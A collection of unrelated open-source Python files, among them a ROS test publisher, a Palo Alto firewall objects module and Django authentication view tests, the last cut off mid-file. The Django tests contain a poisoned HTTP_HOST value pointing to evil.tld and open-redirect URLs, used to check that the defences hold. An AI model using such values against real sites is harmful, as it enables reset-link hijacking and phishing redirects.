bandwidth_high = rospy.get_param("~bandwidth_high", 1024 * 1024)
bandwidth_low = rospy.get_param("~bandwidth_low", 1024)
# in seconds
change_interval = rospy.Duration(rospy.get_param("~period", 30) / 2)
msg = list()
msg.append("." * (bandwidth_low / frequency))
msg.append("." * (bandwidth_high / frequency))
current = 0
last_change = rospy.Time.now()
while not rospy.is_shutdown():
if(rospy.Time.now() - last_change > change_interval):
last_change = rospy.Time.now()
current = not current
print current
pub.publish(msg[current])
rate.sleep()
def stop_publish():
start = rospy.Time.now()
while not rospy.is_shutdown() and rospy.Time.now() - start < rospy.Duration(rospy.get_param("~timeout", 30)):
pub.publish(
"publishing until it stops. " * int(random.randrange(100, 150)))
rospy.Rate(rospy.get_param("~frequency", 10)).sleep()
def freq_high_low():
sleep_time_high = rospy.Duration(1.0 / rospy.get_param("~frequency_high", 200))
sleep_time_low = rospy.Duration(1.0 / rospy.get_param("~frequency_low", 10))
# in seconds
change_interval = rospy.Duration(rospy.get_param("~period", 10) / 2)
sleep_time = list()
sleep_time.append(sleep_time_high)
sleep_time.append(sleep_time_low)
current = 0
msg = "." * 100
last_change = rospy.Time.now()
while not rospy.is_shutdown():
calc_time = rospy.Time.now()
if(rospy.Time.now() - last_change > change_interval):
last_change = rospy.Time.now()
current = not current
pub.publish(msg)
calc_time = rospy.Time.now() - calc_time
rospy.sleep(sleep_time[current] - calc_time)
def freq_high_low_once():
sleep_time_high = rospy.Duration(1.0 / rospy.get_param("~frequency_high", 200))
sleep_time_low = rospy.Duration(1.0 / rospy.get_param("~frequency_low", 10))
# in seconds
change_interval = rospy.Duration(rospy.get_param("~switch_after", 30))
sleep_time = list()
sleep_time.append(sleep_time_high)
sleep_time.append(sleep_time_low)
current = 0
msg = "." * 100
last_change = rospy.Time.now()
while not rospy.is_shutdown():
calc_time = rospy.Time.now()
if(rospy.Time.now() - last_change > change_interval) and (current == 0):
last_change = rospy.Time.now()
current = not current
pub.publish(msg)
calc_time = rospy.Time.now() - calc_time
rospy.sleep(sleep_time[current] - calc_time)
def freq_sine():
mid = rospy.get_param("~frequency_mid", 100)
var = rospy.get_param("~frequency_variation", 20)
# period normalised to
period = rospy.get_param("~period", 30)
begin = rospy.Time.now()
msg = "." * 100
while not rospy.is_shutdown():
calc_time = rospy.Time.now()
cur = rospy.Time.now() - begin
fluctuation = math.sin(2 * math.pi * cur.to_sec() / period ) * var
# rospy.logwarn("fluc is %f"%fluctuation)
frequency = mid + fluctuation
pub.publish(msg)
calc_time = rospy.Time.now() - calc_time
# rospy.logwarn("calc time is %f"%calc_time.to_sec())
# rospy.logwarn("should sleep %f", 1 / frequency)
rospy.sleep(rospy.Duration(1/frequency) - calc_time)
'''
~mode = ("constant", "stop_publish", "sawtooth", "sine", "floored_abs", "linear_abs")
~frequency = 10
stop_publish:
# stops random publishing after timeout seconds
~timeout = 30
sawtooth:
# publishes more and more data then resets to bandwidth_low
~bandwidth_high = 200
~bandwidth_low = 1
~steps = bandwidth_high - bandwidth_low # steps to go from low to high
sine:
# publishes data in a sinus curve
~bandwidth_mid = 100
~bandwidth_variation = 5000 # sinus' amplitude
floored_abs:
# publishes a floor(abs(x))-shape
linear_abs:
# publishes a abs(x)-shape
'''
if __name__ == '__main__':
rospy.init_node('node_name', log_level=rospy.DEBUG)
pub = rospy.Publisher(
rospy.get_param('~topic_name', 'topic_name'), String, queue_size=10)
modes = {
'constant': constant,
'stop_publish': stop_publish,
# 'sawtooth': sawtooth,
'sine': sine,
'high_low': high_low,
'freq_high_low': freq_high_low,
'freq_sine': freq_sine,
'freq_high_low_once': freq_high_low_once}
mode = rospy.get_param("~mode", "freq_high_low_once")
if mode in modes:
modes[mode]()
|
andreasBihlmaier/arni
|
arni_core/test/predefined_publisher.py
|
Python
|
bsd-2-clause
| 7,498
|
"""
Ecks plugin to collect system memory usage information
Copyright 2011 Chris Read (chris.read@gmail.com)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
def get_memory(parent, host, community):
""" This is a plugin to be loaded by Ecks
return a tuple containing (total_swap, avail_swap, total_real, avail_real, mem_buffer, mem_cached). Values are in kiloBytes
"""
memory = (1,3,6,1,4,1,2021,4) # UCD-SNMP-MIB
data = parent.get_snmp_data(host, community, memory, 1)
if data:
return map(parent._build_answer,
parent._extract(data, int, 3),
parent._extract(data, int, 4),
parent._extract(data, int, 5),
parent._extract(data, int, 6),
parent._extract(data, int, 14),
parent._extract(data, int, 15),
)[0]
|
cread/ecks
|
ecks/plugins/memory.py
|
Python
|
apache-2.0
| 1,335
|
import sys
import os
import numpy as np
import lasagne as nn
import theano
import theano.tensor as T
from PIL import Image
import utils as u
import models as m
import config as c
# 01/03/2016
# Trains a convnet for going from the conv features back to images
# because just using the bottom of the autoencoder doesn't work if
# splitting on any layer other than 'encode'
def main(data_file='', img_size = 64, num_epochs = 10, batch_size = 128,
pxsh = 0.5, split_layer = 'conv7', specstr=c.pf_cae_specstr,
cae_params=c.pf_cae_params, save_to='params'):
# transform function to go from images -> conv feats
conv_feats,_ = m.encoder_decoder(cae_params, specstr=specstr,
layersplit=split_layer, shape=(img_size,img_size))
# build pretrained net for images -> convfeats in order to get the input shape
# for the reverse function
print('compiling functions')
conv_net = m.build_cae(input_var=None, specstr=specstr, shape=(img_size,img_size))
cae_layer_dict = dict((l.name, l) for l in nn.layers.get_all_layers(conv_net))
shape = nn.layers.get_output_shape(cae_layer_dict[split_layer])
# build net for convfeats -> images
imgs_var = T.tensor4('images')
convs_var = T.tensor4('conv_features')
deconv_net = m.build_deconv_net(input_var=convs_var, shape=shape, specstr=specstr)
loss = nn.objectives.squared_error(imgs_var, nn.layers.get_output(deconv_net)).mean()
te_loss = nn.objectives.squared_error(imgs_var, nn.layers.get_output(deconv_net,
deterministic=True)).mean()
params = nn.layers.get_all_params(deconv_net, trainable=True)
lr = theano.shared(nn.utils.floatX(3e-3))
updates = nn.updates.adam(loss, params, learning_rate=lr)
# compile functions
train_fn = theano.function([convs_var, imgs_var], loss, updates=updates)
val_fn = theano.function([convs_var, imgs_var], te_loss)
deconv_fn = theano.function([convs_var], nn.layers.get_output(deconv_net,
deterministic=True))
# run training loop
print("training for {} epochs".format(num_epochs))
def data_transform(x, do_center):
floatx_ims = u.raw_to_floatX(x, pixel_shift=pxsh, square=True, center=do_center)
return (conv_feats(floatx_ims), floatx_ims)
data = u.DataH5PyStreamer(data_file, batch_size=batch_size)
hist = u.train_with_hdf5(data, num_epochs=num_epochs, train_fn=train_fn, test_fn=val_fn,
tr_transform=lambda x: data_transform(x[0], do_center=False),
te_transform=lambda x: data_transform(x[0], do_center=True))
# generate examples, save training history and params
te_stream = data.streamer(shuffled=True)
imb, = next(te_stream.get_epoch_iterator())
imb = data_transform(imb, True)[0]
result = deconv_fn(imb)
for i in range(result.shape[0]):
Image.fromarray(u.get_picture_array(result, index=i, shift=pxsh)) \
.save('output_{}.jpg'.format(i))
hist = np.asarray(hist)
np.savetxt('deconv_train_hist.csv', np.asarray(hist), delimiter=',', fmt='%.5f')
u.save_params(deconv_net, os.path.join(save_to, 'deconv_{}.npz'.format(hist[-1,-1])))
if __name__ == '__main__':
# make all arguments of main(...) command line arguments (with type inferred from
# the default value) - this doesn't work on bools so those are strings when
# passed into main.
import argparse, inspect
parser = argparse.ArgumentParser(description='Command line options')
ma = inspect.getargspec(main)
for arg_name,arg_type in zip(ma.args[-len(ma.defaults):],[type(de) for de in ma.defaults]):
parser.add_argument('--{}'.format(arg_name), type=arg_type, dest=arg_name)
args = parser.parse_args(sys.argv[1:])
main(**{k:v for (k,v) in vars(args).items() if v is not None})
|
tencia/video_predict
|
train_deconv.py
|
Python
|
mit
| 3,819
|
from AutoNetkit.examples.examples import *
import AutoNetkit.examples.examples
|
sk2/ank_le
|
AutoNetkit/examples/__init__.py
|
Python
|
bsd-3-clause
| 80
|
#!/usr/bin/env python
# Copyright (c) 2014, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Objects module contains objects that exist in the 'Objects' tab in the firewall GUI"""
# import modules
import re
import logging
import xml.etree.ElementTree as ET
import pandevice
from pandevice import getlogger
from pandevice.base import PanObject, Root, MEMBER, ENTRY
from pandevice.base import VarPath as Var
from pandevice.base import VersionedPanObject
from pandevice.base import VersionedParamPath
# import other parts of this pandevice package
import pandevice.errors as err
logger = getlogger(__name__)
class AddressObject(VersionedPanObject):
"""Address Object
Args:
name (str): Name of the object
value (str): IP address or other value of the object
type (str): Type of address:
* ip-netmask (default)
* ip-range
* fqdn
description (str): Description of this object
tag (list): Administrative tags
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/address')
# params
params = []
params.append(VersionedParamPath(
'value', path='{type}'))
params.append(VersionedParamPath(
'type', default='ip-netmask',
values=['ip-netmask', 'ip-range', 'fqdn'], path='{type}'))
params.append(VersionedParamPath(
'description', path='description'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class AddressGroup(VersionedPanObject):
"""Address Group
Args:
static_value (list): Values for a static address group
dynamic_value (str): Registered-ip tags for a dynamic address group
description (str): Description of this object
tag (list): Administrative tags (not to be confused with registered-ip tags)
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/address-group')
# params
params = []
params.append(VersionedParamPath(
'static_value', path='static', vartype='member'))
params.append(VersionedParamPath(
'dynamic_value', path='dynamic/filter'))
params.append(VersionedParamPath(
'description', path='description'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class Tag(VersionedPanObject):
"""Administrative tag
Args:
name (str): Name of the tag
color (str): Color ID (eg. 'color1', 'color4', etc). You can
use :func:`~pandevice.objects.Tag.color_code` to generate the ID.
comments (str): Comments
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/tag')
# params
params = []
params.append(VersionedParamPath(
'color', path='color'))
params.append(VersionedParamPath(
'comments', path='comments'))
self._params = tuple(params)
@staticmethod
def color_code(color_name):
"""Returns the color code for a color
Args:
color_name (str): One of the following colors:
* red
* green
* blue
* yellow
* copper
* orange
* purple
* gray
* light green
* cyan
* light gray
* blue gray
* lime
* black
* gold
* brown
"""
colors = {
'red': 1,
'green': 2,
'blue': 3,
'yellow': 4,
'copper': 5,
'orange': 6,
'purple': 7,
'gray': 8,
'light green': 9,
'cyan': 10,
'light gray': 11,
'blue gray': 12,
'lime': 13,
'black': 14,
'gold': 15,
'brown': 16,
}
if color_name not in colors:
raise ValueError("Color '{0}' is not valid".format(color_name))
return "color"+str(colors[color_name])
class ServiceObject(VersionedPanObject):
"""Service Object
Args:
name (str): Name of the object
protocol (str): Protocol of the service, either tcp or udp
source_port (str): Source port of the protocol, if any
destination_port (str): Destination port of the service
description (str): Description of this object
tag (list): Administrative tags
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/service')
# params
params = []
params.append(VersionedParamPath(
'protocol', path='protocol/{protocol}',
values=['tcp', 'udp'], default='tcp'))
params.append(VersionedParamPath(
'source_port', path='protocol/{protocol}/source-port'))
params.append(VersionedParamPath(
'destination_port', path='protocol/{protocol}/port'))
params.append(VersionedParamPath(
'description', path='description'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class ServiceGroup(VersionedPanObject):
"""ServiceGroup Object
Args:
name (str): Name of the object
value (list): List of service values
tag (list): Administrative tags
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/service-group')
# params
params = []
params.append(VersionedParamPath(
'value', path='members', vartype='member'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class ApplicationObject(VersionedPanObject):
"""Application Object
Args:
name (str): Name of the object
category (str): Application category
subcategory (str): Application subcategory
technology (str): Application technology
risk (int): Risk (1-5) of the application
default_type (str): Default identification type of the application
default_value (list): Values for the default type
parent_app (str): Parent Application for which this app falls under
timeout (int): Default timeout
tcp_timeout (int): TCP timeout
udp_timeout (int): UDP timeout
tcp_half_closed_timeout (int): TCP half closed timeout
tcp_time_wait_timeout (int): TCP wait time timeout
evasive_behavior (bool): Applicaiton is actively evasive
consume_big_bandwidth (bool): Application uses large bandwidth
used_by_malware (bool): Application is used by malware
able_to_transfer_file (bool): Application can do file transfers
has_known_vulnerability (bool): Application has known vulnerabilities
tunnel_other_application (bool):
tunnel_applications (list): List of tunneled applications
prone_to_misuse (bool):
pervasive_use (bool):
file_type_ident (bool):
virus_ident (bool):
data_ident (bool):
description (str): Description of this object
tag (list): Administrative tags
Please refer to https://applipedia.paloaltonetworks.com/ for more info on these params
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/application')
# params
params = []
params.append(VersionedParamPath(
'category', path='category'))
params.append(VersionedParamPath(
'subcategory', path='subcategory'))
params.append(VersionedParamPath(
'technology', path='technology'))
params.append(VersionedParamPath(
'risk', path='risk', vartype='int'))
params.append(VersionedParamPath(
'default_type', path='default/{default_type}',
values=['port', 'ident-by-ip-protocol', 'ident-by-icmp-type', 'ident-by-icmp6-type']))
params.append(VersionedParamPath(
'default_port', path='default/{default_type}', vartype='member',
condition={'default_type': 'port'}))
params.append(VersionedParamPath(
'default_ip_protocol', path='default/{default_type}',
condition={'default_type': 'ident-by-ip-protocol'}))
params.append(VersionedParamPath(
'default_icmp_type', path='default/{default_type}/type', vartype='int',
condition={'default_type': ['ident-by-icmp-type', 'ident-by-icmp6-type']}))
params.append(VersionedParamPath(
'default_icmp_code', path='default/{default_type}/code', vartype='int',
condition={'default_type': ['ident-by-icmp-type', 'ident-by-icmp6-type']}))
params.append(VersionedParamPath(
'parent_app', path='parent-app'))
params.append(VersionedParamPath(
'timeout', path='timeout', vartype='int'))
params.append(VersionedParamPath(
'tcp_timeout', path='tcp-timeout', vartype='int'))
params.append(VersionedParamPath(
'udp_timeout', path='udp-timeout', vartype='int'))
params.append(VersionedParamPath(
'tcp_half_closed_timeout', path='tcp-half-closed-timeout', vartype='int'))
params.append(VersionedParamPath(
'tcp_time_wait_timeout', path='tcp-time-wait-timeout', vartype='int'))
params.append(VersionedParamPath(
'evasive_behavior', path='evasive-behavior', vartype='yesno'))
params.append(VersionedParamPath(
'consume_big_bandwidth', path='consume-big-bandwidth', vartype='yesno'))
params.append(VersionedParamPath(
'used_by_malware', path='used-by-malware', vartype='yesno'))
params.append(VersionedParamPath(
'able_to_transfer_file', path='able-to-transfer-file', vartype='yesno'))
params.append(VersionedParamPath(
'has_known_vulnerability', path='has-known-vulnerability', vartype='yesno'))
params.append(VersionedParamPath(
'tunnel_other_application', path='tunnel-other-application', vartype='yesno'))
params.append(VersionedParamPath(
'tunnel_applications', path='tunnel-applications', vartype='member'))
params.append(VersionedParamPath(
'prone_to_misuse', path='prone-to-misuse', vartype='yesno'))
params.append(VersionedParamPath(
'pervasive_use', path='pervasive-use', vartype='yesno'))
params.append(VersionedParamPath(
'file_type_ident', path='file-type-ident', vartype='yesno'))
params.append(VersionedParamPath(
'virus_ident', path='virus-ident', vartype='yesno'))
params.append(VersionedParamPath(
'data_ident', path='data-ident', vartype='yesno'))
params.append(VersionedParamPath(
'description', path='description'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class ApplicationGroup(VersionedPanObject):
"""ApplicationGroup Object
Args:
name (str): Name of the object
value (list): List of application values
tag (list): Administrative tags
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/application-group')
# params
params = []
params.append(VersionedParamPath(
'value', path='members', vartype='member'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class ApplicationFilter(VersionedPanObject):
"""ApplicationFilter Object
Args:
name (str): Name of the object
category (list): Application category
subcategory (list): Application subcategory
technology (list): Application technology
risk (list): Application risk
evasive (bool):
excessive_bandwidth_use (bool):
prone_to_misuse (bool):
is_saas (bool):
transfers_files (bool):
tunnels_other_apps (bool):
used_by_malware (bool):
has_known_vulnerabilities (bool):
pervasive (bool):
tag (list): Administrative tags
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/application-filter')
# params
params = []
params.append(VersionedParamPath(
'category', path='category', vartype='member'))
params.append(VersionedParamPath(
'subcategory', path='subcategory', vartype='member'))
params.append(VersionedParamPath(
'technology', path='technology', vartype='member'))
params.append(VersionedParamPath(
'risk', path='risk', vartype='member'))
params.append(VersionedParamPath(
'evasive', path='evasive', vartype='yesno'))
params.append(VersionedParamPath(
'excessive_bandwidth_use', path='excessive-bandwidth-use', vartype='yesno'))
params.append(VersionedParamPath(
'prone_to_misuse', path='prone-to-misuse', vartype='yesno'))
params.append(VersionedParamPath(
'is_saas', path='is-saas', vartype='yesno'))
params.append(VersionedParamPath(
'transfers_files', path='transfers-files', vartype='yesno'))
params.append(VersionedParamPath(
'tunnels_other_apps', path='tunnels-other-apps', vartype='yesno'))
params.append(VersionedParamPath(
'used_by_malware', path='used-by-malware', vartype='yesno'))
params.append(VersionedParamPath(
'has_known_vulnerabilities', path='has-known-vulnerabilities', vartype='yesno'))
params.append(VersionedParamPath(
'pervasive', path='pervasive', vartype='yesno'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class ApplicationContainer(VersionedPanObject):
"""ApplicationContainer object
This is a special class that is used in the predefined module.
It acts much like an ApplicationGroup object but exists only
in the predefined context. It is more or less a way that
Palo Alto groups predefined applications together.
Args:
applications (list): List of memeber applications
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/application-container')
# params
params = []
params.append(VersionedParamPath(
'applications', path='functions', vartype='member'))
self._params = tuple(params)
|
PaloAltoNetworks/terraform-templates
|
pan_guard_duty/lambda_code/pandevice/objects.py
|
Python
|
apache-2.0
| 16,190
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("JEEVES_SETTINGS_MODULE", "settings")
from jeeves.core.management import execute_from_command_line
execute_from_command_line(sys.argv[1:])
|
silent1mezzo/jeeves-framework
|
jeeves/conf/project_template/bot.py
|
Python
|
isc
| 246
|
# -*- coding: utf-8 -*-
class TrafficEntry:
def __init__(self, broadcast_count=0L, broadcast_bytes=0L, unicast_count=0L, unicast_bytes=0L):
self.broadcast_count = broadcast_count
self.broadcast_bytes = broadcast_bytes
self.unicast_count = unicast_count
self.unicast_bytes = unicast_bytes
class Traffic:
def __init__(self, send=TrafficEntry(), recv=TrafficEntry()):
self.send = send
self.recv = recv
def in_rpc_traffic(self, pack):
if pack is None:
return
self.recv.broadcast_bytes = pack.get_value("Recv.BroadcastBytes")
self.recv.broadcast_count = pack.get_value("Recv.BroadcastCount")
self.recv.unicast_bytes = pack.get_value("Recv.UnicastBytes")
self.recv.unicast_count = pack.get_value("Recv.UnicastCount")
self.send.broadcast_bytes = pack.get_value("Send.BroadcastBytes")
self.send.broadcast_count = pack.get_value("Send.BroadcastCount")
self.send.unicast_bytes = pack.get_value("Send.UnicastBytes")
self.send.unicast_count = pack.get_value("Send.UnicastCount")
|
relman/sevpn-mgmt-py
|
SevpnMgmtPy/admin_api/traffic.py
|
Python
|
mit
| 1,143
|
import os
import re
import urllib
from django.conf import settings
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.sites.models import Site, RequestSite
from django.contrib.auth.models import User
from django.test import TestCase
from django.core import mail
from django.core.exceptions import SuspiciousOperation
from django.core.urlresolvers import reverse
from django.http import QueryDict
class AuthViewsTestCase(TestCase):
"""
Helper base class for all the follow test cases.
"""
fixtures = ['authtestdata.json']
urls = 'django.contrib.auth.tests.urls'
def setUp(self):
self.old_LANGUAGES = settings.LANGUAGES
self.old_LANGUAGE_CODE = settings.LANGUAGE_CODE
settings.LANGUAGES = (('en', 'English'),)
settings.LANGUAGE_CODE = 'en'
self.old_TEMPLATE_DIRS = settings.TEMPLATE_DIRS
settings.TEMPLATE_DIRS = (
os.path.join(os.path.dirname(__file__), 'templates'),
)
def tearDown(self):
settings.LANGUAGES = self.old_LANGUAGES
settings.LANGUAGE_CODE = self.old_LANGUAGE_CODE
settings.TEMPLATE_DIRS = self.old_TEMPLATE_DIRS
def login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password
}
)
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith(settings.LOGIN_REDIRECT_URL))
self.assertTrue(SESSION_KEY in self.client.session)
class PasswordResetTest(AuthViewsTestCase):
def test_email_not_found(self):
"Error is raised if the provided email address isn't currently registered"
response = self.client.get('/password_reset/')
self.assertEqual(response.status_code, 200)
response = self.client.post('/password_reset/', {'email': 'not_a_real_email@email.com'})
self.assertContains(response, "That e-mail address doesn't have an associated user account")
self.assertEqual(len(mail.outbox), 0)
def test_email_found(self):
"Email is sent if a valid email address is provided for password reset"
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
def test_email_found_custom_from(self):
"Email is sent if a valid email address is provided for password reset when a custom from_email is provided."
response = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)
def test_admin_reset(self):
"If the reset view is marked as being for admin, the HTTP_HOST header is used for a domain override."
response = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='adminsite.com'
)
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://adminsite.com" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
def test_poisoned_http_host(self):
"Poisoned HTTP_HOST headers can't be used for reset emails"
# This attack is based on the way browsers handle URLs. The colon
# should be used to separate the port, but if the URL contains an @,
# the colon is interpreted as part of a username for login purposes,
# making 'evil.com' the request domain. Since HTTP_HOST is used to
# produce a meaningful reset URL, we need to be certain that the
# HTTP_HOST header isn't poisoned. This is done as a check when get_host()
# is invoked, but we check here as a practical consequence.
def test_host_poisoning():
self.client.post('/password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertRaises(SuspiciousOperation, test_host_poisoning)
self.assertEqual(len(mail.outbox), 0)
def test_poisoned_http_host_admin_site(self):
"Poisoned HTTP_HOST headers can't be used for reset emails on admin views"
def test_host_poisoning():
self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertRaises(SuspiciousOperation, test_host_poisoning)
self.assertEqual(len(mail.outbox), 0)
def _test_confirm_start(self):
# Start by creating the email
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def _read_signup_email(self, email):
urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
self.assertTrue(urlmatch is not None, "No URL found in sent email")
return urlmatch.group(), urlmatch.groups()[0]
def test_confirm_valid(self):
url, path = self._test_confirm_start()
response = self.client.get(path)
# redirect to a 'complete' page:
self.assertEqual(response.status_code, 200)
self.assertTrue("Please enter your new password" in response.content)
def test_confirm_invalid(self):
url, path = self._test_confirm_start()
# Let's munge the token in the path, but keep the same length,
# in case the URLconf will reject a different length.
path = path[:-5] + ("0"*4) + path[-1]
response = self.client.get(path)
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_invalid_user(self):
# Ensure that we get a 200 response for a non-existant user, not a 404
response = self.client.get('/reset/123456-1-1/')
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_overflow_user(self):
# Ensure that we get a 200 response for a base36 user id that overflows int
response = self.client.get('/reset/zzzzzzzzzzzzz-1-1/')
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_invalid_post(self):
# Same as test_confirm_invalid, but trying
# to do a POST instead.
url, path = self._test_confirm_start()
path = path[:-5] + ("0"*4) + path[-1]
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2':' anewpassword'})
# Check the password has not been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(not u.check_password("anewpassword"))
def test_confirm_complete(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
# It redirects us to a 'complete' page:
self.assertEqual(response.status_code, 302)
# Check the password has been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(u.check_password("anewpassword"))
# Check we can't use the link again
response = self.client.get(path)
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_different_passwords(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2':' x'})
self.assertEqual(response.status_code, 200)
self.assertTrue("The two password fields didn't match" in response.content)
class ChangePasswordTest(AuthViewsTestCase):
def fail_login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("Please enter a correct username and password. Note that both fields are case-sensitive." in response.content)
def logout(self):
response = self.client.get('/logout/')
def test_password_change_fails_with_invalid_old_password(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'donuts',
'new_password1': 'password1',
'new_password2': 'password1',
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("Your old password was entered incorrectly. Please enter it again." in response.content)
def test_password_change_fails_with_mismatched_passwords(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'donuts',
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("The two password fields didn't match." in response.content)
def test_password_change_succeeds(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
}
)
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/password_change/done/'))
self.fail_login()
self.login(password='password1')
class LoginTest(AuthViewsTestCase):
def test_current_site_in_context_after_login(self):
response = self.client.get(reverse('django.contrib.auth.views.login'))
self.assertEqual(response.status_code, 200)
if Site._meta.installed:
site = Site.objects.get_current()
self.assertEqual(response.context['site'], site)
self.assertEqual(response.context['site_name'], site.name)
else:
self.assertIsInstance(response.context['site'], RequestSite)
self.assertTrue(isinstance(response.context['form'], AuthenticationForm),
'Login form is not an AuthenticationForm')
def test_security_check(self, password='password'):
login_url = reverse('django.contrib.auth.views.login')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urllib.quote(bad_url)
}
response = self.client.post(nasty_url, {
'username': 'testclient',
'password': password,
}
)
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response['Location'],
"%s should be blocked" % bad_url)
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/url%20with%20spaces/', # see ticket #12534
):
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urllib.quote(good_url)
}
response = self.client.post(safe_url, {
'username': 'testclient',
'password': password,
}
)
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response['Location'],
"%s should be allowed" % good_url)
class LoginURLSettings(AuthViewsTestCase):
urls = 'django.contrib.auth.tests.urls'
def setUp(self):
super(LoginURLSettings, self).setUp()
self.old_LOGIN_URL = settings.LOGIN_URL
def tearDown(self):
super(LoginURLSettings, self).tearDown()
settings.LOGIN_URL = self.old_LOGIN_URL
def get_login_required_url(self, login_url):
settings.LOGIN_URL = login_url
response = self.client.get('/login_required/')
self.assertEqual(response.status_code, 302)
return response['Location']
def test_standard_login_url(self):
login_url = '/login/'
login_required_url = self.get_login_required_url(login_url)
